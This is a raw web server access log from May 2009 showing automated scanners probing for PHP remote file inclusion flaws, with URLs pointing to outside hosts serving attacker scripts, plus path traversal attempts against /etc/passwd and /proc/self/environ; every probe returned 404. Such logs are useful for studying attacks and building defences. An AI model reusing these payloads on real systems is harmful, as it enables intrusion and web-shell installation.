38.99.183.43 - - [17/May/2009:09:49:21 -0500] "GET //config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
38.99.183.43 - - [17/May/2009:09:49:21 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
38.99.183.43 - - [17/May/2009:09:49:21 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
38.99.183.43 - - [17/May/2009:09:49:37 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
60.251.217.4 - - [17/May/2009:09:53:21 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
60.251.217.4 - - [17/May/2009:09:53:25 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
60.251.217.4 - - [17/May/2009:09:53:25 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
60.251.217.4 - - [17/May/2009:09:53:26 -0500] "GET /logs/access_log.1237420800//admin/classes/TplLoad.php?full_path_to_public_program=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
79.45.98.65 - - [17/May/2009:09:53:32 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.826"
79.45.98.65 - - [17/May/2009:09:53:32 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.826"
79.45.98.65 - - [17/May/2009:09:53:50 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.826"
79.45.98.65 - - [17/May/2009:09:53:51 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.826"
60.251.217.4 - - [17/May/2009:09:54:04 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
60.251.217.4 - - [17/May/2009:09:54:08 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
60.251.217.4 - - [17/May/2009:09:54:08 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
60.251.217.4 - - [17/May/2009:09:54:51 -0500] "GET /logs/access_log.1237420800//admin/classes/TplLoad.php?full_path_to_public_program=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
202.46.2.197 - - [17/May/2009:09:56:05 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_artlinks&_REQUEST[Itemid]=50&GLOBALS=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
202.46.2.197 - - [17/May/2009:09:56:06 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_artlinks&_REQUEST[Itemid]=50&GLOBALS=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
79.45.98.65 - - [17/May/2009:09:58:37 -0500] "GET /logs//tools/send_reminders.php?includedir=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.826"
79.45.98.65 - - [17/May/2009:09:58:38 -0500] "GET //tools/send_reminders.php?includedir=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.826"
121.173.130.41 - - [17/May/2009:09:59:33 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:09:59:33 -0500] "GET /logs/access_log.1240185600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:09:59:33 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:09:59:55 -0500] "GET /logs/access_log.1239926400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.14.58.2 - - [17/May/2009:10:01:32 -0500] "GET /logs//bbshop/admin/index.php?_shop_path=http://www.rennellcorp.com/logs/v4id.txt??? HTTP/1.0" 404 299 "-""libwww-perl/5.48"
195.14.58.2 - - [17/May/2009:10:01:33 -0500] "GET //bbshop/admin/index.php?_shop_path=http://www.rennellcorp.com/logs/v4id.txt??? HTTP/1.0" 404 294 "-""libwww-perl/5.48"
202.75.4.169 - - [17/May/2009:10:02:32 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_artlinks&_REQUEST[Itemid]=50&GLOBALS=&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.75.4.169 - - [17/May/2009:10:02:33 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_artlinks&_REQUEST[Itemid]=50&GLOBALS=&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
218.150.79.146 - - [17/May/2009:10:03:27 -0500] "GET //include/lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:10:03:27 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:10:03:27 -0500] "GET /logs/access_log.1228867200//include/lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
80.231.93.159 - - [17/May/2009:10:05:20 -0500] "GET /logs/errors.php?error=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
80.231.93.159 - - [17/May/2009:10:05:20 -0500] "GET /errors.php?error=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
80.231.93.159 - - [17/May/2009:10:05:29 -0500] "GET /logs/errors.php?error=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
80.231.93.159 - - [17/May/2009:10:05:29 -0500] "GET /errors.php?error=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
204.11.17.16 - - [17/May/2009:10:09:49 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
204.11.17.16 - - [17/May/2009:10:09:49 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
204.11.17.16 - - [17/May/2009:10:09:49 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
204.11.17.16 - - [17/May/2009:10:09:49 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
65.55.208.143 - - [17/May/2009:10:10:25 -0500] "GET /logs/access_log.1241136000 HTTP/1.1" 200 653236 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
217.172.168.63 - - [17/May/2009:10:12:33 -0500] "GET /logs/access_log.1239926400/akocomments.php?mosConfig_absolute_path=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
217.172.168.63 - - [17/May/2009:10:12:33 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
217.172.168.63 - - [17/May/2009:10:12:33 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
60.251.217.4 - - [17/May/2009:10:13:25 -0500] "GET /logs/access_log.1235865600//admin/classes/TplLoad.php?full_path_to_public_program=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.214.37.11 - - [17/May/2009:10:13:33 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.214.37.11 - - [17/May/2009:10:13:33 -0500] "GET /logs/access_log.1228867200//include/lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.214.37.11 - - [17/May/2009:10:13:33 -0500] "GET //include/lib.inc.php?site_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
209.151.224.239 - - [17/May/2009:10:13:41 -0500] "GET /logs/environment.php?DIR_PREFIX=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.823"
209.151.224.239 - - [17/May/2009:10:13:41 -0500] "GET /environment.php?DIR_PREFIX=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.823"
60.251.217.4 - - [17/May/2009:10:13:41 -0500] "GET /logs/access_log.1235865600//admin/classes/TplLoad.php?full_path_to_public_program=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
83.103.72.130 - - [17/May/2009:10:15:57 -0500] "GET /logs/!scanhttp://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
83.103.72.130 - - [17/May/2009:10:15:58 -0500] "GET /!scanhttp://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
83.103.72.130 - - [17/May/2009:10:15:58 -0500] "GET /logs/!scanhttp://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
83.103.72.130 - - [17/May/2009:10:15:58 -0500] "GET /!scanhttp://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:10:16:16 -0500] "GET /logs/!scanhttp://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:10:16:17 -0500] "GET /!scanhttp://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:10:16:18 -0500] "GET /logs/!scanhttp://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:10:16:19 -0500] "GET /!scanhttp://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
80.231.93.159 - - [17/May/2009:10:18:06 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
80.231.93.159 - - [17/May/2009:10:18:06 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
88.191.103.144 - - [17/May/2009:10:18:34 -0500] "GET /logs/index.php?configFile=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:10:18:34 -0500] "GET /logs/access_log.1238112000/index.php?configFile=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:10:18:34 -0500] "GET /index.php?configFile=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 292 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:10:18:34 -0500] "GET /logs/access_log.1239235200/index.php?configFile=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.231.93.159 - - [17/May/2009:10:18:51 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
80.231.93.159 - - [17/May/2009:10:18:51 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
211.202.2.220 - - [17/May/2009:10:20:08 -0500] "GET /logs///index.php?sIncPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.202.2.220 - - [17/May/2009:10:20:08 -0500] "GET /logs/access_log.1233964800///index.php?sIncPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.202.2.220 - - [17/May/2009:10:20:09 -0500] "GET ///index.php?sIncPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.202.2.220 - - [17/May/2009:10:20:16 -0500] "GET /logs/access_log.1237766400///index.php?sIncPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.149.163.198 - - [17/May/2009:10:21:17 -0500] "GET /logs/show.php?path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 296 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
62.149.163.198 - - [17/May/2009:10:21:17 -0500] "GET /show.php?path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 291 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
62.149.163.198 - - [17/May/2009:10:21:18 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
62.149.163.198 - - [17/May/2009:10:21:18 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
62.149.163.198 - - [17/May/2009:10:21:18 -0500] "GET /logs/show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 296 "-""XXXXXX"
62.149.163.198 - - [17/May/2009:10:21:18 -0500] "GET /show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 291 "-""XXXXXX"
62.149.163.198 - - [17/May/2009:10:21:18 -0500] "GET /logs/show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""XXXXXX"
62.149.163.198 - - [17/May/2009:10:21:18 -0500] "GET /show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""XXXXXX"
24.39.162.98 - - [17/May/2009:10:21:48 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
24.39.162.98 - - [17/May/2009:10:21:48 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.103.72.130 - - [17/May/2009:10:22:18 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
83.103.72.130 - - [17/May/2009:10:22:18 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
83.103.72.130 - - [17/May/2009:10:22:24 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
83.103.72.130 - - [17/May/2009:10:22:24 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
221.139.104.104 - - [17/May/2009:10:23:33 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
221.139.104.104 - - [17/May/2009:10:23:33 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
24.39.162.98 - - [17/May/2009:10:26:02 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
24.39.162.98 - - [17/May/2009:10:26:03 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
67.15.206.26 - - [17/May/2009:10:26:24 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.15.206.26 - - [17/May/2009:10:26:24 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.15.206.26 - - [17/May/2009:10:26:24 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
203.130.231.111 - - [17/May/2009:10:26:50 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:10:26:54 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:10:27:12 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:10:27:13 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
213.176.143.122 - - [17/May/2009:10:27:53 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.bloodsport-switzerland.org//content/download/fx29id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
213.176.143.122 - - [17/May/2009:10:27:53 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.bloodsport-switzerland.org//content/download/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
213.176.143.122 - - [17/May/2009:10:27:53 -0500] "GET /logs/access_log.1235692800//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.bloodsport-switzerland.org//content/download/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
213.176.143.122 - - [17/May/2009:10:27:53 -0500] "GET /logs/access_log.1232064000//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.bloodsport-switzerland.org//content/download/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.15.206.26 - - [17/May/2009:10:30:39 -0500] "GET /logs/access_log.1235865600//admin/classes/TplLoad.php?full_path_to_public_program=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:10:31:33 -0500] "GET /logs/access_log.1239926400//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 320 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:10:31:33 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 293 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:10:31:33 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.221.130.2 - - [17/May/2009:10:36:41 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:10:36:41 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
218.27.203.107 - - [17/May/2009:10:38:25 -0500] "GET //skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:38:26 -0500] "GET /logs/access_log.1231545600//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:38:27 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:39:29 -0500] "GET /logs/access_log.1230336000//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
77.221.130.2 - - [17/May/2009:10:41:24 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.221.130.2 - - [17/May/2009:10:41:24 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.221.130.2 - - [17/May/2009:10:41:24 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.221.130.2 - - [17/May/2009:10:41:27 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:10:45:29 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:45:29 -0500] "GET /logs/access_log.1230595200//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:46:44 -0500] "GET /logs/access_log.1229817600//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
217.152.200.46 - - [17/May/2009:10:46:58 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://twosomeplace.net/bbs/icon/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.813"
217.152.200.46 - - [17/May/2009:10:46:58 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://twosomeplace.net/bbs/icon/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.813"
218.27.203.107 - - [17/May/2009:10:48:27 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:48:28 -0500] "GET /logs/access_log.1231545600//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:48:31 -0500] "GET //skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:10:48:31 -0500] "GET /logs/access_log.1233187200//skin/zero_vote/error.php?dir=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
